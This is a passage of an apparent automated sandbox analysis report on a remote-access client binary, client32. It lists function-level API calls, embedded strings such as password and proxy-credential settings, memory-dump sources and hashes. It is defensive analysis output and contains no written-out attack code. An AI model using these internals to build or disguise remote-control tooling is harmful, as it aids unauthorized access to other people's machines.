ResumeTimeout, xrefs: 6C3D6BBA
FALSE, xrefs: 6C3D6E67
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C3D6E62
ProcessMessage returned FALSE. Terminating connection, xrefs: 6C3D6F25

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
API String ID: 1449423504-919941520
Opcode ID: 05f313984d45ab3d7a4ae63db183b827599d31d731a2c4f8e521e6a95f3f6055
Instruction ID: 379c26d32bb75ef4c344bad1445fc42196fd3c5122d0e0330b9507afa0938513
Opcode Fuzzy Hash: 05f313984d45ab3d7a4ae63db183b827599d31d731a2c4f8e521e6a95f3f6055
Instruction Fuzzy Hash: BBB1EAB2F40254DBDB20EF64CD44BD973B8EB48308F01449AE599E7640D7B5AAC4CFA2

Function 11085800 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108588C
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110858AA
LoadLibraryA.KERNEL32(?), ref: 110858EC
GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11085907
GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108591C
GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108592D
GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108593E
GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108594F
GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11085960

Strings

CipherServer_OpenSession, xrefs: 11085938
CipherServer_ResetSession, xrefs: 1108598D
CipherServer_GetRandomData, xrefs: 1108597C
CipherServer_Destroy, xrefs: 11085916
CipherServer_EncryptBlocks, xrefs: 1108595A
CipherServer_DecryptBlocks, xrefs: 1108596B
CipherServer_CloseSession, xrefs: 11085949
CipherServer_Create, xrefs: 11085901
CryptPak.dll, xrefs: 1108585B, 110858BE
CipherServer_GetInfoBlock, xrefs: 11085927

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$FileModuleName
String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
API String ID: 2201880244-3035937465
Opcode ID: fd380371f00269f16310bf564c54f4b19dea901ccf65685a4d8d33474bdf57a1
Instruction ID: ffe7acf55b8ecb502240b98f08f0e41ebf2edc523c1d6770b247593d800ae2e8
Opcode Fuzzy Hash: fd380371f00269f16310bf564c54f4b19dea901ccf65685a4d8d33474bdf57a1
Instruction Fuzzy Hash: B951B070E0430AAFD711DF69CC80AAAFFE8AF55304B1189AEE895D7245EA71E440CF51

Function 1113DC30 Relevance: 35.7, APIs: 3, Strings: 17, Instructions: 672registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 1113DCEA

Strings

Warning. Can't calc AD policy changes, xrefs: 1113E125
IsA(), xrefs: 1113E46D
Add [%s]%s=%s, xrefs: 1113E1D6
RoomSpec, xrefs: 1113E167, 1113E41A
Chg [%s]%s=%s, xrefs: 1113E295
Info. Policy changed - re-initui, xrefs: 1113E3B2
NSM.LIC, xrefs: 1113DCF0
Info. Policy changed - reload transports..., xrefs: 1113E3D6
client., xrefs: 1113E0E6
NSA.LIC, xrefs: 1113DCFF, 1113DD06, 1113DD2D
Info. Lockup averted for AD policy changes, xrefs: 1113DEBD, 1113DEE4
_debug, xrefs: 1113E186
Client, xrefs: 1113E16C, 1113E41F
Del [%s]%s=%s, xrefs: 1113E235
client, xrefs: 1113E103
TracePolicyChange, xrefs: 1113E181
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1113E468

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Close
String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 3535843008-2062829784
Opcode ID: f239c4176fcb391b0be97296b1f237455f869c0cff7c5d4290fa3a3c6bbb707b
Instruction ID: 02d2500bd8507f7215b42bc9b22f69daac85bfef0f692aecd5c8aef97b6e3c88
Opcode Fuzzy Hash: f239c4176fcb391b0be97296b1f237455f869c0cff7c5d4290fa3a3c6bbb707b
Instruction Fuzzy Hash: D1420774E112699FEB11CB60CD80FDEFB76AFD4319F4040D8D90967285EA726A84CF62

Function 11073B20 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294threadtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11073C05
InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11073C0B
InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11073C11
InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11073C1A
InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11073C20
InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11073C26
_strncpy.LIBCMT ref: 11073C88
ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 11073CEF
CreateThread.KERNEL32(00000000,00004000,Function_0006FDD0,00000000,00000000,?), ref: 11073D8C
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11073D93
SetTimer.USER32(00000000,00000000,000000FA,11062CD0), ref: 11073DD7
std::exception::exception.LIBCMT ref: 11073E88
__CxxThrowException@8.LIBCMT ref: 11073EA3

Strings

RememberPassword, xrefs: 11073CA0
destroy_queue == NULL, xrefs: 11073C3B
..\ctl32\Connect.cpp, xrefs: 11073C36
Password, xrefs: 11073D43
DefaultUsername, xrefs: 11073CD0
General, xrefs: 11073CA5, 11073CD5, 11073D48

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
API String ID: 703120326-1497550179
Opcode ID: 29f058c5a9057f6f79308e3ac2ba18c38136c505e3417f24906f8625876d7054
Instruction ID: 8c0d2492ba74464a27e7fafdba04c8cff94809d0046ba1d5fe8a3d0465e383b7
Opcode Fuzzy Hash: 29f058c5a9057f6f79308e3ac2ba18c38136c505e3417f24906f8625876d7054
Instruction Fuzzy Hash: 34B1C4B5A00319AFE710DF64CC85FDAF7F4BB48704F0085A9E6599B281EB70BA44CB65

Function 110301C1 Relevance: 31.9, APIs: 10, Strings: 8, Instructions: 351registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,?,00000001,?), ref: 110301DB
RegCloseKey.KERNEL32(?), ref: 11030303

Part of subcall function 1116010D: __isdigit_l.LIBCMT ref: 11160132

GetStockObject.GDI32(0000000D), ref: 110305B2
GetObjectA.GDI32(00000000,0000003C,?), ref: 110305C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11030600
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11030606
InterlockedExchange.KERNEL32(023C8D48,00001388), ref: 11030686
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110306B8

Part of subcall function 1113F3A0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110C55B,76938400,?,?,111414FF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F3C0

Strings

pcicl32, xrefs: 11030791
3, xrefs: 11030332
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 110301CB
.%d, xrefs: 110306C2
CurrentMinorVersionNumber, xrefs: 110302CC
Error %s unloading audiocap dll, xrefs: 110308CF
CurrentMajorVersionNumber, xrefs: 11030299
CurrentVersion, xrefs: 110301FC

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$pcicl32
API String ID: 1620732580-1805425335
Opcode ID: 5bf617742519fe54f20a3747e880bd3843f8a4d3c49cc4c074326b7432669296
Instruction ID: 101fda974b992bd0c3f09ca7f45ae94f7834bb943de0c71e9fec058e221e6226
Opcode Fuzzy Hash: 5bf617742519fe54f20a3747e880bd3843f8a4d3c49cc4c074326b7432669296
Instruction Fuzzy Hash: 76D1F9B0D06355DFEB11CBA4CC84BAEFBF4AB8430DF1041EAD449A7289EB715A44CB51

Function 11136170 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11141440: GetVersionExA.KERNEL32(111EBE98,76938400), ref: 11141470
Part of subcall function 11141440: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 111414AF
Part of subcall function 11141440: _memset.LIBCMT ref: 111414CD
Part of subcall function 11141440: _strncpy.LIBCMT ref: 1114159A

PostMessageA.USER32(000203F4,000006CF,00000007,00000000), ref: 1113634F

Part of subcall function 1105D350: __wcstoi64.LIBCMT ref: 1105D38D

SetWindowTextA.USER32(000203F4,00000000), ref: 111363F7
IsWindowVisible.USER32(000203F4), ref: 111364BC
GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 111364DC
IsWindowVisible.USER32(000203F4), ref: 111364EA
SetForegroundWindow.USER32(00000000), ref: 11136518
EnableWindow.USER32(000203F4,00000001), ref: 11136527
IsWindowVisible.USER32(000203F4), ref: 11136578
IsWindowVisible.USER32(000203F4), ref: 11136585
EnableWindow.USER32(000203F4,00000000), ref: 11136599
EnableWindow.USER32(000203F4,00000000), ref: 111364FF

Part of subcall function 1112E440: ShowWindow.USER32(000203F4,00000000,?,111365A2,00000007,?,?,?,?,?,00000000), ref: 1112E464

EnableWindow.USER32(000203F4,00000001), ref: 111365AD

Strings

ConnectedText, xrefs: 11136288, 11136297
ShowUIOnConnect, xrefs: 1113632D
LockedText, xrefs: 111362CF
Client, xrefs: 111361F1, 1113629B, 111362D4, 11136332
HideWhenIdle, xrefs: 111361EC
ViewedText, xrefs: 1113627B

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
API String ID: 3453649892-3803836183
Opcode ID: 9a6a2bfc5674f72dc46c2502b35efee9287a353186de450facfaa19a7b811576
Instruction ID: e5f70ba24fe9707544c094c3b520392dd4d0da00b27c206184a1dd93fe5a05e3
Opcode Fuzzy Hash: 9a6a2bfc5674f72dc46c2502b35efee9287a353186de450facfaa19a7b811576
Instruction Fuzzy Hash: 68C12B75B112259FEB12DFE0CD81B6EF7A4AB8032DF104434E915AB28CDB31E944C791

Function 6C3D33A0 Relevance: 29.1, APIs: 2, Strings: 17, Instructions: 571COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 6C3D34FD
wsprintfA.USER32 ref: 6C3D3727

Strings

*PINServer, xrefs: 6C3D35C4
PinProxy, xrefs: 6C3D35ED
*GatewayAddress, xrefs: 6C3D3430
*UseWebProxy, xrefs: 6C3D343C
*WebProxy, xrefs: 6C3D3459
Gateway_WebProxy, xrefs: 6C3D359D
P, xrefs: 6C3D3533
r<=l, xrefs: 6C3D33B3
client247, xrefs: 6C3D362F
ProxyPassword, xrefs: 6C3D36F7
ProxyCred, xrefs: 6C3D362A
:%d, xrefs: 6C3D34F7
UsePinProxy, xrefs: 6C3D35D0
%s:%s, xrefs: 6C3D3721
ProxyUsername, xrefs: 6C3D36E0
Gateway, xrefs: 6C3D3577
Gateway_UseWebProxy, xrefs: 6C3D3585

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247$r<=l
API String ID: 2111968516-3406756761
Opcode ID: ccec189b7d53c30b89fa4372a0ddeeda715f1d1eb3311ff5909ca82855a26c87
Instruction ID: ade80ab35f513ea117d68782b75a95ab2602d9ffb2ce014ec42b4db538e60d47
Opcode Fuzzy Hash: ccec189b7d53c30b89fa4372a0ddeeda715f1d1eb3311ff5909ca82855a26c87
Instruction Fuzzy Hash: 1D2276B3B04358ABDB64DF64CC80EEEB779AB49204F0485D9E54967A40DB316F88CF52

Function 11027DE0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130librarysynchronizationCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 11027E31

Part of subcall function 11080C50: _strrchr.LIBCMT ref: 11080C5E

wsprintfA.USER32 ref: 11027E54
WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027E99
GetExitCodeProcess.KERNEL32(?,?), ref: 11027EAD
wsprintfA.USER32 ref: 11027ED1
CloseHandle.KERNEL32(?), ref: 11027EE7
CloseHandle.KERNEL32(?), ref: 11027EF0
LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11027F51
GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11027F65

Strings

NSM.LIC, xrefs: 11027DF9, 11027F10
\GetUserLang.exe", xrefs: 11027E4E
", xrefs: 11027E2A
Locales\%d\, xrefs: 11027EC1
pcicl32_res.dll, xrefs: 11027F29
Setting resource langid=%d, xrefs: 11027F11
SetClientResLang called, gPlatform %x, xrefs: 11027DFC

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
API String ID: 512045693-419896573
Opcode ID: 268e5f9e54febdc28a185ae7cfa9fa307afb7a1bfb687f4eee2c79e45644aca9
Instruction ID: 876bbb39ee5dad39a06bb9fa3df6a5915df4966271857e52aabb2b5ad19aa6c4
Opcode Fuzzy Hash: 268e5f9e54febdc28a185ae7cfa9fa307afb7a1bfb687f4eee2c79e45644aca9
Instruction Fuzzy Hash: E341D675E04229ABD714CF65CC85FEAF7B8EB44309F0081A9F95497244DBB0AD40CFA0

Function 11084F10 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PCIINV.DLL,33E68B52,026E6D10,026E6D00,?,00000000,1117EC8C,000000FF,?,110312D2,026E6D10,00000000,?,?,?), ref: 11084F45

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

Part of subcall function 1110C580: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,1110D2DD,00000000,00000001,?,?,?,?,?,110309CC), ref: 1110C59E

GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11084F6B
GetProcAddress.KERNEL32(00000000,Cancel), ref: 11084F7F
GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11084F93
wsprintfA.USER32 ref: 1108501B
wsprintfA.USER32 ref: 11085032
wsprintfA.USER32 ref: 11085049
CloseHandle.KERNEL32(00000000,11084D70,00000001,00000000), ref: 1108519A

Part of subcall function 11084B80: CloseHandle.KERNEL32(?,7622F550,?,?,110851C0,?,110312D2,026E6D10,00000000,?,?,?), ref: 11084B98
Part of subcall function 11084B80: CloseHandle.KERNEL32(?,7622F550,?,?,110851C0,?,110312D2,026E6D10,00000000,?,?,?), ref: 11084BAB
Part of subcall function 11084B80: CloseHandle.KERNEL32(?,7622F550,?,?,110851C0,?,110312D2,026E6D10,00000000,?,?,?), ref: 11084BBE
Part of subcall function 11084B80: FreeLibrary.KERNEL32(00000000,7622F550,?,?,110851C0,?,110312D2,026E6D10,00000000,?,?,?), ref: 11084BD1

Strings

%s_HW.%s, xrefs: 11085012
%s_SW.%s, xrefs: 1108502C
Cancel, xrefs: 11084F79
%s_HF.%s, xrefs: 11085043
GetInventory, xrefs: 11084F65
GetInventoryEx, xrefs: 11084F87
PCIINV.DLL, xrefs: 11084F40

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
